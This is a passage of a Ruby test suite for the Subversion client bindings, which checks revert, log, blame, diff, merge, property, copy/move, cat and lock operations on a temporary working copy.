  dir = "dir"
  dir_path = File.join(@wc_path, dir)
  path1 = File.join(@wc_path, file1)
  path2 = File.join(@wc_path, file2)
  path3 = File.join(dir_path, file3)
  content = "Hello"
  ctx = make_context(log)
  File.open(path1, "w"){|f| f.print(content)}
  File.open(path2, "w"){|f| f.print(content)}
  ctx.add(path1)
  ctx.add(path2)
  ctx.mkdir(dir_path)
  File.open(path3, "w"){|f| f.print(content)}
  ctx.add(path3)
  commit_info = ctx.commit(@wc_path)
  # Single path.
  File.open(path1, "w"){}
  assert_equal("", File.open(path1){|f| f.read})
  ctx.revert(path1)
  assert_equal(content, File.open(path1){|f| f.read})
  # Array of paths.
  File.open(path1, "w"){}
  File.open(path2, "w"){}
  assert_equal("", File.open(path1){|f| f.read})
  assert_equal("", File.open(path2){|f| f.read})
  ctx.revert([path1, path2])
  assert_equal(content, File.open(path1){|f| f.read})
  assert_equal(content, File.open(path2){|f| f.read})
  # Whole tree, recursive (default).
  File.open(path1, "w"){}
  File.open(path2, "w"){}
  File.open(path3, "w"){}
  assert_equal("", File.open(path1){|f| f.read})
  assert_equal("", File.open(path2){|f| f.read})
  assert_equal("", File.open(path3){|f| f.read})
  ctx.revert(@wc_path)
  assert_equal(content, File.open(path1){|f| f.read})
  assert_equal(content, File.open(path2){|f| f.read})
  assert_equal(content, File.open(path3){|f| f.read})
  # Non-recursive revert of the root reverts nothing below it.
  File.open(path1, "w"){}
  File.open(path2, "w"){}
  File.open(path3, "w"){}
  assert_equal("", File.open(path1){|f| f.read})
  assert_equal("", File.open(path2){|f| f.read})
  assert_equal("", File.open(path3){|f| f.read})
  ctx.revert(@wc_path, false)
  assert_equal("", File.open(path1){|f| f.read})
  assert_equal("", File.open(path2){|f| f.read})
  assert_equal("", File.open(path3){|f| f.read})
  # Reverting a subdirectory only touches files inside it.
  File.open(path1, "w"){}
  File.open(path2, "w"){}
  File.open(path3, "w"){}
  assert_equal("", File.open(path1){|f| f.read})
  assert_equal("", File.open(path2){|f| f.read})
  assert_equal("", File.open(path3){|f| f.read})
  ctx.revert(dir_path)
  assert_equal("", File.open(path1){|f| f.read})
  assert_equal("", File.open(path2){|f| f.read})
  assert_equal(content, File.open(path3){|f| f.read})
end
# log over three commits (add, copy, copy+modify): verifies per-path revision
# lists, log messages, the changed-path sets, and the action/copyfrom
# metadata ('A' adds, 'M' modifies, copied? with copyfrom path/rev).
def test_log
  log1 = "sample log1"
  log2 = "sample log2"
  log3 = "sample log3"
  src1 = "source1\n"
  src2 = "source2\n"
  src3 = "source3\n"
  file1 = "sample1.txt"
  file2 = "sample2.txt"
  file3 = "sample3.txt"
  path1 = File.join(@wc_path, file1)
  path2 = File.join(@wc_path, file2)
  path3 = File.join(@wc_path, file3)
  abs_path1 = File.join('', file1) # repository-absolute paths ("/sampleN.txt")
  abs_path2 = File.join('', file2)
  abs_path3 = File.join('', file3)
  ctx = make_context(log1)
  File.open(path1, "w") {|f| f.print(src1)}
  ctx.add(path1)
  rev1 = ctx.ci(@wc_path).revision
  ctx = make_context(log2)
  ctx.cp(path1, path2)
  rev2 = ctx.ci(@wc_path).revision
  ctx = make_context(log3)
  ctx.cp(path1, path3)
  File.open(path1, "w") {|f| f.print(src2)}
  File.open(path3, "w") {|f| f.print(src3)}
  rev3 = ctx.ci(@wc_path).revision
  changed_paths_lists = {}
  revs = {}
  messages = {}
  keys = [@wc_path, path1, path2, path3]
  keys.each do |key|
    revs[key] = []
    changed_paths_lists[key] = []
    messages[key] = []
    args = [key, 1, "HEAD", 0, true, nil]
    ctx.log(*args) do |changed_paths, rev, author, date, message|
      revs[key] << rev
      changed_paths_lists[key] << changed_paths
      messages[key] << message
    end
  end
  changed_paths_list = changed_paths_lists[@wc_path]
  assert_equal([rev1, rev2, rev3], revs[@wc_path])
  assert_equal([rev1, rev3], revs[path1])
  assert_equal([rev1, rev2], revs[path2]) # copies inherit source history
  assert_equal([rev1, rev3], revs[path3])
  assert_equal([log1, log2, log3], messages[@wc_path])
  expected = [[abs_path1], [abs_path2], [abs_path1, abs_path3]]
  actual = changed_paths_list.collect {|changed_paths| changed_paths.keys}
  assert_nested_sorted_array(expected, actual)
  assert_equal('A', changed_paths_list[0][abs_path1].action)
  assert_false(changed_paths_list[0][abs_path1].copied?)
  assert_equal('A', changed_paths_list[1][abs_path2].action)
  assert_true(changed_paths_list[1][abs_path2].copied?)
  assert_equal(abs_path1, changed_paths_list[1][abs_path2].copyfrom_path)
  assert_equal(rev1, changed_paths_list[1][abs_path2].copyfrom_rev)
  assert_equal('M', changed_paths_list[2][abs_path1].action)
  assert_equal('A', changed_paths_list[2][abs_path3].action)
end
# log_message returns the commit message of a given path at a given revision.
def test_log_message
  log = "sample log"
  file = "hello.txt"
  path = File.join(@wc_path, file)
  FileUtils.touch(path)
  ctx = make_context(log)
  ctx.add(path)
  commit_info = ctx.commit(@wc_path)
  rev = commit_info.revision
  assert_equal(log, ctx.log_message(path, rev))
end
# blame yields [line_no, revision, author, date, line] per line, attributing
# each appended line to its commit; the `ann` alias refuses binary files
# (non-text svn:mime-type) with CLIENT_IS_BINARY_FILE.
def test_blame
  log = "sample log"
  file = "hello.txt"
  srcs = %w(first second third)
  infos = []
  path = File.join(@wc_path, file)
  ctx = make_context(log)
  File.open(path, "w") {|f| f.puts(srcs[0])}
  ctx.add(path)
  commit_info = ctx.commit(@wc_path)
  infos << [0, commit_info.revision, @author, commit_info.date, srcs[0]]
  File.open(path, "a") {|f| f.puts(srcs[1])}
  commit_info = ctx.commit(@wc_path)
  infos << [1, commit_info.revision, @author, commit_info.date, srcs[1]]
  File.open(path, "a") {|f| f.puts(srcs[2])}
  commit_info = ctx.commit(@wc_path)
  infos << [2, commit_info.revision, @author, commit_info.date, srcs[2]]
  result = []
  ctx.blame(path) do |line_no, revision, author, date, line|
    result << [line_no, revision, author, date, line]
  end
  assert_equal(infos, result)
  ctx.prop_set(Svn::Core::PROP_MIME_TYPE, "image/DUMMY", path) # mark binary
  ctx.commit(@wc_path)
  assert_raise(Svn::Error::CLIENT_IS_BINARY_FILE) do
    ctx.ann(path) {}
  end
end
# diff writes unified diff output to out_file: first committed rev1 vs the
# modified WORKING copy, then rev1 vs rev2 after committing the change.
def test_diff
  log = "sample log"
  before = "before\n"
  after = "after\n"
  file = "hello.txt"
  path = File.join(@wc_path, file)
  File.open(path, "w") {|f| f.print(before)}
  ctx = make_context(log)
  ctx.add(path)
  commit_info = ctx.commit(@wc_path)
  rev1 = commit_info.revision
  File.open(path, "w") {|f| f.print(after)}
  out_file = Tempfile.new("svn")
  err_file = Tempfile.new("svn")
  ctx.diff([], path, rev1, path, "WORKING", out_file.path, err_file.path)
  out_file.open
  assert_match(/-#{before}\+#{after}\z/, out_file.read)
  commit_info = ctx.commit(@wc_path)
  rev2 = commit_info.revision
  out_file = Tempfile.new("svn")
  ctx.diff([], path, rev1, path, rev2, out_file.path, err_file.path)
  out_file.open
  assert_match(/-#{before}\+#{after}\z/, out_file.read)
end
# Same scenario as test_diff, via the peg-revision variant diff_peg
# (single path, start/end revisions instead of two path+rev pairs).
def test_diff_peg
  log = "sample log"
  before = "before\n"
  after = "after\n"
  file = "hello.txt"
  path = File.join(@wc_path, file)
  File.open(path, "w") {|f| f.print(before)}
  ctx = make_context(log)
  ctx.add(path)
  commit_info = ctx.commit(@wc_path)
  rev1 = commit_info.revision
  File.open(path, "w") {|f| f.print(after)}
  out_file = Tempfile.new("svn")
  err_file = Tempfile.new("svn")
  ctx.diff_peg([], path, rev1, "WORKING", out_file.path, err_file.path)
  out_file.open
  assert_match(/-#{before}\+#{after}\z/, out_file.read)
  commit_info = ctx.commit(@wc_path)
  rev2 = commit_info.revision
  out_file = Tempfile.new("svn")
  ctx.diff_peg([], path, rev1, rev2, out_file.path, err_file.path)
  out_file.open
  assert_match(/-#{before}\+#{after}\z/, out_file.read)
end
# diff_summarize yields summary objects instead of textual diffs; a text
# change between rev1 and rev2 reports kind_modified? on a file node with no
# property change.
def test_diff_summarize
  log = "sample log"
  before = "before\n"
  after = "after\n"
  file = "hello.txt"
  path = File.join(@wc_path, file)
  File.open(path, "w") {|f| f.print(before)}
  ctx = make_context(log)
  ctx.add(path)
  commit_info = ctx.commit(@wc_path)
  rev1 = commit_info.revision
  File.open(path, "w") {|f| f.print(after)}
  commit_info = ctx.commit(@wc_path)
  rev2 = commit_info.revision
  diffs = []
  ctx.diff_summarize(@wc_path, rev1, @wc_path, rev2) do |diff|
    diffs << diff
  end
  assert_equal([file], diffs.collect {|d| d.path})
  kinds = diffs.collect do |d|
    [d.kind_normal?, d.kind_added?, d.kind_modified?, d.kind_deleted?]
  end
  assert_equal([[false, false, true, false]], kinds) # modified only
  assert_equal([false], diffs.collect {|d| d.prop_changed?})
  node_kinds = diffs.collect do |d|
    [d.node_kind_none?, d.node_kind_file?,
     d.node_kind_dir?, d.node_kind_unknown?]
  end
  assert_equal([[false, true, false, false]], node_kinds) # file node
end
# Exercises Client::Context#diff_summarize_peg across a history where a
# file is renamed (rev2), modified (rev3), reverted (rev4) and renamed
# again (rev5); summarizing rev3..rev4 at peg rev3 must report a single
# modification of the renamed file.
def test_diff_summarize_peg
log = "sample log"
before = "before\n"
after = "after\n"
before_file = "before.txt"
after_file = "after.txt"
moved_file = "moved.txt"
before_path = File.join(@wc_path, before_file)
after_path = File.join(@wc_path, after_file)
moved_path = File.join(@wc_path, moved_file)
File.open(before_path, "w") {|f| f.print(before)}
ctx = make_context(log)
ctx.add(before_path)
commit_info = ctx.commit(@wc_path)
rev1 = commit_info.revision
ctx.mv(before_path, after_path)
commit_info = ctx.commit(@wc_path)
rev2 = commit_info.revision
File.open(after_path, "w") {|f| f.print(after)}
commit_info = ctx.commit(@wc_path)
rev3 = commit_info.revision
File.open(after_path, "w") {|f| f.print(before)}
commit_info = ctx.commit(@wc_path)
rev4 = commit_info.revision
ctx.mv(after_path, moved_path)
commit_info = ctx.commit(@wc_path)
rev5 = commit_info.revision
diffs = []
ctx.diff_summarize_peg(@repos_uri, rev3, rev4, rev3) do |diff|
diffs << diff
end
assert_equal([after_file], diffs.collect {|d| d.path})
kinds = diffs.collect do |d|
[d.kind_normal?, d.kind_added?, d.kind_modified?, d.kind_deleted?]
end
assert_equal([[false, false, true, false]], kinds)
assert_equal([false], diffs.collect {|d| d.prop_changed?})
node_kinds = diffs.collect do |d|
[d.node_kind_none?, d.node_kind_file?,
d.node_kind_dir?, d.node_kind_unknown?]
end
assert_equal([[false, true, false, false]], node_kinds)
end
# Shared scenario for test_merge and test_merge_peg. The caller's block
# performs one merge step; it is yielded
#   (ctx, merge_source, from_rev, to_rev, target [, extra args])
# The scenario: create trunk and branch, change the branch, merge it to
# trunk, verify mergeinfo via #log_merged / #merged, then merge a branch
# file deletion, drop svn:mergeinfo, and finally check the dry-run /
# record-only variants via the trailing boolean args passed to the block.
def assert_merge
log = "sample log"
file = "sample.txt"
src = "sample\n"
trunk = File.join(@wc_path, "trunk")
branch = File.join(@wc_path, "branch")
branch_relative_uri = "/branch"
branch_uri = "#{@repos_uri}#{branch_relative_uri}"
trunk_path = File.join(trunk, file)
trunk_path_uri = "#{@repos_uri}/trunk/#{file}"
branch_path = File.join(branch, file)
branch_path_relative_uri = "#{branch_relative_uri}/#{file}"
branch_path_uri = "#{@repos_uri}#{branch_path_relative_uri}"
ctx = make_context(log)
ctx.mkdir(trunk, branch)
File.open(trunk_path, "w") {}
File.open(branch_path, "w") {}
ctx.add(trunk_path)
ctx.add(branch_path)
rev1 = ctx.commit(@wc_path).revision
File.open(branch_path, "w") {|f| f.print(src)}
rev2 = ctx.commit(@wc_path).revision
# Before any merge: no merged history recorded on trunk.
merged_entries = []
ctx.log_merged(trunk, nil, branch_uri, nil) do |entry|
merged_entries << entry
end
assert_equal_log_entries([], merged_entries)
assert_nil(ctx.merged(trunk))
merged_entries = []
# First merge: rev1..rev2 from branch into trunk.
yield(ctx, branch, rev1, rev2, trunk)
ctx.log_merged(trunk, nil, branch_uri, nil) do |entry|
merged_entries << entry
end
assert_equal_log_entries([
[
{branch_path_relative_uri => ["M", nil, -1]},
rev2,
{
"svn:author" => @author,
"svn:log" => log,
},
false,
]
],
merged_entries)
# Mergeinfo on trunk must now record branch revs 1-2 (inheritable).
mergeinfo = ctx.merged(trunk)
assert_not_nil(mergeinfo)
assert_equal([branch_uri], mergeinfo.keys)
ranges = mergeinfo[branch_uri].collect {|range| range.to_a}
assert_equal([[1, 2, true]], ranges)
rev3 = ctx.commit(@wc_path).revision
assert_equal(normalize_line_break(src), ctx.cat(trunk_path, rev3))
# Delete the file on the branch and merge the deletion into trunk.
ctx.rm(branch_path)
rev4 = ctx.commit(@wc_path).revision
yield(ctx, branch, rev3, rev4, trunk)
assert(!File.exist?(trunk_path))
merged_entries = []
ctx.log_merged(trunk, rev4, branch_uri, rev4) do |entry|
merged_entries << entry
end
assert_equal_log_entries([
[
{branch_path_relative_uri => ["D", nil, -1]},
rev4,
{
"svn:author" => @author,
"svn:log" => log,
},
false,
]
] * 2, merged_entries)
# Removing svn:mergeinfo erases the recorded merge history.
ctx.propdel("svn:mergeinfo", trunk)
merged_entries = []
ctx.log_merged(trunk, rev4, branch_uri, rev4) do |entry|
merged_entries << entry
end
assert_equal_log_entries([], merged_entries)
ctx.revert(trunk)
ctx.revert(trunk_path)
File.open(trunk_path, "a") {|f| f.print(src)}
yield(ctx, branch, rev3, rev4, trunk)
rev5 = ctx.commit(@wc_path).revision
assert(File.exist?(trunk_path))
# Dry-run merge (extra trailing args) must leave the WC untouched...
yield(ctx, branch, rev3, rev4, trunk, nil, false, true, true)
statuses = []
ctx.status(trunk) do |path, status|
statuses << status
end
assert_equal([], statuses)
# ...while a real merge produces local modifications.
yield(ctx, branch, rev3, rev4, trunk, nil, false, true)
statuses = []
ctx.status(trunk) do |path, status|
statuses << status
end
assert_not_equal([], statuses)
end
# Runs the shared merge scenario using Client::Context#merge.
def test_merge
assert_merge do |ctx, from, from_rev1, from_rev2, to, *rest|
ctx.merge(from, from_rev1, from, from_rev2, to, *rest)
end
end
# Runs the shared merge scenario using Client::Context#merge_peg.
def test_merge_peg
assert_merge do |ctx, from, from_rev1, from_rev2, to, *rest|
ctx.merge_peg(from, from_rev1, from_rev2, to, nil, *rest)
end
end
# Exercises Client::Context#cleanup: a working copy locked by an open
# AdmAccess cannot be committed; cleanup is cancellable via the cancel
# func; a successful cleanup releases the lock so commit succeeds and
# the stale AdmAccess handle then fails to close.
def test_cleanup
log = "sample log"
file = "sample.txt"
src = "sample\n"
path = File.join(@wc_path, file)
ctx = make_context(log)
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
rev = ctx.commit(@wc_path).revision
# Downdate, then obstruct the update with a recreated file.
ctx.up(@wc_path, rev - 1)
File.open(path, "w") {|f| f.print(src)}
assert_raise(Svn::Error::WC_OBSTRUCTED_UPDATE) do
ctx.up(@wc_path, rev)
end
Svn::Wc::AdmAccess.open(nil, @wc_path, true, -1) do |access|
assert_raise(Svn::Error::WC_LOCKED) do
ctx.commit(@wc_path)
end
end
# A cancel func that always raises aborts cleanup, leaving the lock.
ctx.set_cancel_func do
raise Svn::Error::CANCELLED
end
Svn::Wc::AdmAccess.open(nil, @wc_path, true, -1) do |access|
assert_raise(Svn::Error::CANCELLED) do
ctx.cleanup(@wc_path)
end
assert_raise(Svn::Error::WC_LOCKED) do
ctx.commit(@wc_path)
end
end
ctx.set_cancel_func(nil)
access = Svn::Wc::AdmAccess.open(nil, @wc_path, true, -1)
assert_nothing_raised do
ctx.cleanup(@wc_path)
end
assert_nothing_raised do
ctx.commit(@wc_path)
end
# cleanup invalidated the handle, so closing it now raises.
assert_raises(Svn::Error::SvnError) do
access.close
end
end
# Exercises Client::Context#relocate: after switching the WC from the
# file:// URI to the svnserve URI, a context without auth providers can
# no longer read the file.
def test_relocate
log = "sample log"
file = "sample.txt"
src = "sample\n"
path = File.join(@wc_path, file)
ctx = make_context(log)
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
ctx.commit(@wc_path)
assert_nothing_raised do
ctx.cat(path)
end
ctx.add_simple_prompt_provider(0) do |cred, realm, username, may_save|
cred.username = @author
cred.password = @password
cred.may_save = true
end
ctx.relocate(@wc_path, @repos_uri, @repos_svnserve_uri)
# A fresh context has no credentials for the svnserve URI.
ctx = make_context(log)
assert_raises(Svn::Error::AuthnNoProvider) do
ctx.cat(path)
end
end
# Exercises Client::Context#resolved: a text conflict blocks commit;
# a non-recursive resolved on the parent dir does not clear it, while
# a recursive resolved does, allowing the commit to succeed.
def test_resolved
log = "sample log"
file = "sample.txt"
dir = "dir"
src1 = "before\n"
src2 = "after\n"
dir_path = File.join(@wc_path, dir)
path = File.join(dir_path, file)
ctx = make_context(log)
ctx.mkdir(dir_path)
File.open(path, "w") {}
ctx.add(path)
rev1 = ctx.ci(@wc_path).revision
File.open(path, "w") {|f| f.print(src1)}
rev2 = ctx.ci(@wc_path).revision
# Downdate, edit locally, then update to create a conflict.
ctx.up(@wc_path, rev1)
File.open(path, "w") {|f| f.print(src2)}
ctx.up(@wc_path)
assert_raises(Svn::Error::WcFoundConflict) do
ctx.ci(@wc_path)
end
# Non-recursive: the conflicted file below dir_path stays conflicted.
ctx.resolved(dir_path, false)
assert_raises(Svn::Error::WcFoundConflict) do
ctx.ci(@wc_path)
end
ctx.resolved(dir_path)
info = nil
assert_nothing_raised do
info = ctx.ci(@wc_path)
end
assert_not_nil(info)
assert_equal(rev2 + 1, info.revision)
end
# Exercises Client::Context#cp: committing a WC copy notifies only the
# new path (as a commit-add) and the copy's content matches the source.
def test_copy
log = "sample log"
src = "source\n"
file1 = "sample1.txt"
file2 = "sample2.txt"
path1 = File.join(@wc_path, file1)
path2 = File.join(@wc_path, file2)
ctx = make_context(log)
File.open(path1, "w") {|f| f.print(src)}
ctx.add(path1)
ctx.ci(@wc_path)
ctx.cp(path1, path2)
infos = []
ctx.set_notify_func do |notify|
infos << [notify.path, notify]
end
ctx.ci(@wc_path)
assert_equal([path2].sort,
infos.collect{|path, notify| path}.sort)
path2_notify = infos.assoc(path2)[1]
assert(path2_notify.commit_added?)
assert_equal(File.open(path1) {|f| f.read},
File.open(path2) {|f| f.read})
end
# Exercises Client::Context#mv: committing a move notifies the old path
# as deleted and the new path as added, preserving the file content.
def test_move
log = "sample log"
src = "source\n"
file1 = "sample1.txt"
file2 = "sample2.txt"
path1 = File.join(@wc_path, file1)
path2 = File.join(@wc_path, file2)
ctx = make_context(log)
File.open(path1, "w") {|f| f.print(src)}
ctx.add(path1)
ctx.ci(@wc_path)
ctx.mv(path1, path2)
infos = []
ctx.set_notify_func do |notify|
infos << [notify.path, notify]
end
ctx.ci(@wc_path)
assert_equal([path1, path2].sort,
infos.collect{|path, notify| path}.sort)
path1_notify = infos.assoc(path1)[1]
assert(path1_notify.commit_deleted?)
path2_notify = infos.assoc(path2)[1]
assert(path2_notify.commit_added?)
assert_equal(src, File.open(path2) {|f| f.read})
end
# Exercises Client::Context#mv_f (forced move) on a locally modified
# file, then verifies the commit notifications: delete of the source,
# add plus postfix-txdelta of the destination.
def test_move_force
log = "sample log"
src1 = "source1\n"
src2 = "source2\n"
file1 = "sample1.txt"
file2 = "sample2.txt"
path1 = File.join(@wc_path, file1)
path2 = File.join(@wc_path, file2)
ctx = make_context(log)
File.open(path1, "w") {|f| f.print(src1)}
ctx.add(path1)
ctx.ci(@wc_path)
File.open(path1, "w") {|f| f.print(src2)}
assert_nothing_raised do
ctx.mv(path1, path2)
end
# Undo, then repeat the move with the forced variant.
ctx.revert([path1, path2])
FileUtils.rm(path2)
File.open(path1, "w") {|f| f.print(src2)}
assert_nothing_raised do
ctx.mv_f(path1, path2)
end
notifies = []
ctx.set_notify_func do |notify|
notifies << notify
end
ctx.ci(@wc_path)
paths = notifies.collect do |notify|
notify.path
end
# path2 appears twice: once for the add, once for the text delta.
assert_equal([path1, path2, path2].sort, paths.sort)
deleted_paths = notifies.find_all do |notify|
notify.commit_deleted?
end.collect do |notify|
notify.path
end
assert_equal([path1].sort, deleted_paths.sort)
added_paths = notifies.find_all do |notify|
notify.commit_added?
end.collect do |notify|
notify.path
end
assert_equal([path2].sort, added_paths.sort)
postfix_txdelta_paths = notifies.find_all do |notify|
notify.commit_postfix_txdelta?
end.collect do |notify|
notify.path
end
assert_equal([path2].sort, postfix_txdelta_paths.sort)
assert_equal(src2, File.open(path2) {|f| f.read})
end
# Exercises the property API and its aliases (prop_set/ps, prop_get/
# pget/pg, prop_del/pdel/pd) on a file and its parent directory,
# including recursive vs non-recursive behavior and the svn:mime-type
# validation / force override.
def test_prop
log = "sample log"
dir = "dir"
file = "sample.txt"
dir_path = File.join(@wc_path, dir)
dir_uri = "#{@repos_uri}/#{dir}"
path = File.join(dir_path, file)
uri = "#{dir_uri}/#{file}"
prop_name = "sample-prop"
prop_value = "sample value"
invalid_mime_type_prop_value = "image"
ctx = make_context(log)
ctx.mkdir(dir_path)
File.open(path, "w") {}
ctx.add(path)
ctx.commit(@wc_path)
assert_equal({}, ctx.prop_get(prop_name, path))
ctx.prop_set(prop_name, prop_value, path)
ctx.commit(@wc_path)
assert_equal({uri => prop_value}, ctx.pget(prop_name, path))
ctx.prop_del(prop_name, path)
ctx.commit(@wc_path)
assert_equal({}, ctx.pg(prop_name, path))
ctx.ps(prop_name, prop_value, path)
ctx.commit(@wc_path)
assert_equal({uri => prop_value}, ctx.pg(prop_name, path))
# Setting a nil value deletes the property.
ctx.ps(prop_name, nil, path)
ctx.commit(@wc_path)
assert_equal({}, ctx.pg(prop_name, path))
ctx.up(@wc_path)
# Recursive set on the directory propagates to the child file.
ctx.ps(prop_name, prop_value, dir_path)
ctx.ci(@wc_path)
assert_equal({
dir_uri => prop_value,
uri => prop_value,
},
ctx.pg(prop_name, dir_path))
ctx.up(@wc_path)
# Non-recursive delete only affects the directory itself.
ctx.pdel(prop_name, dir_path, false)
ctx.ci(@wc_path)
assert_equal({uri => prop_value}, ctx.pg(prop_name, dir_path))
ctx.up(@wc_path)
ctx.pd(prop_name, dir_path)
ctx.ci(@wc_path)
assert_equal({}, ctx.pg(prop_name, dir_path))
ctx.up(@wc_path)
ctx.ps(prop_name, prop_value, dir_path, false)
ctx.ci(@wc_path)
assert_equal({dir_uri => prop_value}, ctx.pg(prop_name, dir_path))
# "image" is not a valid MIME type value; the force flag bypasses
# the validation.
assert_raises(Svn::Error::BadMimeType) do
ctx.ps(Svn::Core::PROP_MIME_TYPE,
invalid_mime_type_prop_value,
path)
end
ctx.cleanup(@wc_path)
assert_nothing_raised do
ctx.ps(Svn::Core::PROP_MIME_TYPE,
invalid_mime_type_prop_value,
path, false, true)
end
ctx.commit(@wc_path)
assert_equal({uri => invalid_mime_type_prop_value},
ctx.pg(Svn::Core::PROP_MIME_TYPE, path))
end
# Exercises prop_list and its aliases (plist, pl): per-node property
# lists on a file alone and recursively on its parent directory.
def test_prop_list
log = "sample log"
dir = "dir"
file = "sample.txt"
dir_path = File.join(@wc_path, dir)
path = File.join(dir_path, file)
dir_uri = "#{@repos_uri}/#{dir}"
uri = "#{dir_uri}/#{file}"
name1 = "name1"
name2 = "name2"
value1 = "value1"
value2 = "value2"
ctx = make_context(log)
ctx.mkdir(dir_path)
File.open(path, "w") {}
ctx.add(path)
ctx.ci(@wc_path)
assert_equal([], ctx.prop_list(path))
ctx.ps(name1, value1, path)
ctx.ci(@wc_path)
assert_equal([uri], ctx.prop_list(path).collect{|item| item.node_name})
assert_equal([{name1 => value1}],
ctx.plist(path).collect{|item| item.prop_hash})
assert_equal([value1], ctx.pl(path).collect{|item| item[name1]})
ctx.up(@wc_path)
# Recursive set on the directory: both dir and file carry name2.
ctx.ps(name2, value2, dir_path)
ctx.ci(@wc_path)
assert_equal([uri, dir_uri].sort,
ctx.prop_list(dir_path).collect{|item| item.name})
prop_list = ctx.plist(dir_path).collect{|item| [item.name, item.props]}
props = prop_list.assoc(uri)[1]
dir_props = prop_list.assoc(dir_uri)[1]
assert_equal({name1 => value1, name2 => value2}, props)
assert_equal({name2 => value2}, dir_props)
end
# All accepted recurse/depth argument forms: legacy booleans plus the
# svn_depth_t string names.
def recurse_and_depth_choices
[false, true, 'empty', 'files', 'immediates', 'infinity']
end
# Verifies that prop_get/prop_list on a single file behave identically
# for every recurse/depth choice (depth is irrelevant for a file node).
def test_file_prop
setup_greek_tree
log = "sample log"
ctx = make_context(log)
# when no props set, everything is empty
recurse_and_depth_choices.each do |rd|
assert_equal([],
ctx.prop_list(@greek.path(:mu), nil, nil, rd),
"prop_list with Depth '#{rd}'")
end
recurse_and_depth_choices.each do |rd|
assert_equal({},
ctx.prop_get(rd.to_s, @greek.path(:mu), nil, nil, rd),
"prop_get with Depth '#{rd}'")
end
# set some props (one per depth choice, named after the choice)
recurse_and_depth_choices.each do |rd|
ctx.prop_set(rd.to_s, rd.to_s, @greek.path(:mu), rd)
end
ctx.commit(@greek.path(:mu))
# get the props
recurse_and_depth_choices.each do |rd|
assert_equal({@greek.uri(:mu) => rd.to_s},
ctx.prop_get(rd.to_s, @greek.path(:mu), nil, nil, rd),
"prop_get with Depth '#{rd}'")
end
prop_hash = {}
recurse_and_depth_choices.each {|rd| prop_hash[rd.to_s] = rd.to_s}
# list the props
recurse_and_depth_choices.each do |rd|
props = ctx.prop_list(@greek.path(:mu), nil, nil, rd)
assert_equal([@greek.uri(:mu)],
props.collect {|item| item.node_name},
"prop_list (node_name) with Depth '#{rd}'")
props = ctx.plist(@greek.path(:mu), nil, nil, rd)
assert_equal([prop_hash],
props.collect {|item| item.prop_hash},
"prop_list (prop_hash) with Depth '#{rd}'")
recurse_and_depth_choices.each do |rd1|
props = ctx.plist(@greek.path(:mu), nil, nil, rd)
assert_equal([rd1.to_s],
props.collect {|item| item[rd1.to_s]},
"prop_list (#{rd1.to_s}]) with Depth '#{rd}'")
end
end
end
# Verifies depth semantics of prop_set / prop_get / prop_list on a
# directory tree (@greek :b and its descendants): each depth choice is
# used both when setting a property and when querying, and the affected
# node sets must intersect as expected.
def test_dir_prop
setup_greek_tree
log = "sample log"
ctx = make_context(log)
# when no props set, everything is empty
recurse_and_depth_choices.each do |rd|
assert_equal([],
ctx.prop_list(@greek.path(:b), nil, nil, rd),
"prop_list with Depth '#{rd}'")
end
recurse_and_depth_choices.each do |rd|
assert_equal({},
ctx.prop_get(rd.to_s, @greek.path(:b), nil, nil, rd),
"prop_get with Depth '#{rd}'")
end
# set some props with various depths
recurse_and_depth_choices.each do |rd|
ctx.prop_set(rd.to_s, rd.to_s, @greek.path(:b), rd)
end
ctx.commit(@greek.path(:b))
# Which nodes each depth choice reaches when setting from :b.
expected_props = {
true => [:beta, :b, :lambda, :e, :f, :alpha],
false => [:b],
'empty' => [:b],
'files' => [:b, :lambda],
'immediates' => [:b, :lambda, :e, :f],
'infinity' => [:beta, :b, :lambda, :e, :f, :alpha],
}
paths = [:b, :e, :alpha, :beta, :f, :lambda]
# how are the props set?
recurse_and_depth_choices.each do |rd|
paths.each do |path|
if expected_props[rd].include?(path)
expected = {@greek.uri(path) => rd.to_s}
else
expected = {}
end
assert_equal(expected,
ctx.prop_get(rd.to_s, @greek.path(path), nil, nil, false),
"prop_get #{@greek.resolve(path)} with Depth '#{rd}'")
end
end
# Query with every depth: visible nodes are the intersection of the
# set-depth's reach and the query-depth's reach.
recurse_and_depth_choices.each do |rd_for_prop|
recurse_and_depth_choices.each do |rd_for_depth|
expected = {}
expected_paths = expected_props[rd_for_depth]
expected_paths &= expected_props[rd_for_prop]
expected_paths.each do |path|
expected[@greek.uri(path)] = rd_for_prop.to_s
end
assert_equal(expected,
ctx.prop_get(rd_for_prop.to_s, @greek.path(:b),
nil, nil, rd_for_depth),
"prop_get '#{rd_for_prop}' with Depth '#{rd_for_depth}'")
end
end
recurse_and_depth_choices.each do |rd|
props = ctx.prop_list(@greek.path(:b), nil, nil, rd)
assert_equal(expected_props[rd].collect {|path| @greek.uri(path)}.sort,
props.collect {|item| item.node_name}.sort,
"prop_list (node_name) with Depth '#{rd}'")
end
end
# Exercises Client::Context#cat: reading a file at an explicit revision
# and at HEAD (revision omitted) across two commits.
def test_cat
log = "sample log"
src1 = "source1\n"
src2 = "source2\n"
file = "sample.txt"
path = File.join(@wc_path, file)
File.open(path, "w") {|f| f.print(src1)}
ctx = make_context(log)
ctx.add(path)
commit_info = ctx.commit(@wc_path)
rev1 = commit_info.revision
assert_equal(normalize_line_break(src1), ctx.cat(path, rev1))
assert_equal(normalize_line_break(src1), ctx.cat(path))
File.open(path, "w") {|f| f.print(src2)}
commit_info = ctx.commit(@wc_path)
rev2 = commit_info.revision
assert_equal(normalize_line_break(src1), ctx.cat(path, rev1))
assert_equal(normalize_line_break(src2), ctx.cat(path, rev2))
assert_equal(normalize_line_break(src2), ctx.cat(path))
end
# Exercises Client::Context#lock and checks that the notification
# callback reports the (relative) path as locked.
def test_lock
log = "sample log"
src = "source\n"
file = "sample.txt"
path = File.join(@wc_path, file)
File.open(path, "w") {|f| f.print(src)}
ctx = make_context(log)
ctx.add(path)
ctx.commit(@wc_path)
infos = []
ctx.set_notify_func do |notify|
infos << [notify.path, notify]
end
ctx.lock(path)
# Lock notifications carry the basename, not the full WC path.
assert_equal([file], infos.collect{|path, notify| path})
file_notify = infos.assoc(file)[1]
assert(file_notify.locked?)
end
# Exercises Client::Context#unlock on a previously locked file and
# checks the unlock notification.
def test_unlock
log = "sample log"
src = "source\n"
file = "sample.txt"
path = File.join(@wc_path, file)
File.open(path, "w") {|f| f.print(src)}
ctx = make_context(log)
ctx.add(path)
ctx.commit(@wc_path)
ctx.lock(path)
infos = []
ctx.set_notify_func do |notify|
infos << [notify.path, notify]
end
